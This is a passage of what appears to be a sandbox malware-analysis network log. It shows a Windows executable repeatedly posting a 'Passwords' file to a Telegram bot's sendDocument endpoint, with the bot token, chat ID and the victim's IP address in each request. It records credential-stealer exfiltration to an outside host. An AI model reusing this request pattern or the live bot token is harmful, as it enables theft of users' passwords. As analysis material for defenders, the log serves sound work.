                                                                                                            2025-01-10 21:31:49 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43578,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544709,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.349992149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:51 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31fc4d4fd6e7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 63 34 64 34 66 64 36 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31fc4d4fd6e7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:51 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:51 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:51 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43579,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544711,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.349994149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:52 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3210ec87651f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 30 65 63 38 37 36 35 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3210ec87651fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:53 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43580,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544713,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.349996149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:54 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3222bf0eb193
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 32 62 66 30 65 62 31 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3222bf0eb193Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:54 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:54 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:54 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43581,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544714,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.349998149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:56 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32389e6415d8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 38 39 65 36 34 31 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32389e6415d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:56 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 543
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:56 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43582,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544716,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.350000149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:58 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd324d101c9dc9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 64 31 30 31 63 39 64 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd324d101c9dc9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:31:58 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:31:58 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:31:58 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43583,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544718,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.350002149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:31:59 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd326016923807
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:31:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 30 31 36 39 32 33 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd326016923807Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:00 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43584,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544720,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.350004149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:01 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3275c3beec6f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 35 63 33 62 65 65 63 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3275c3beec6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:02 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:01 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
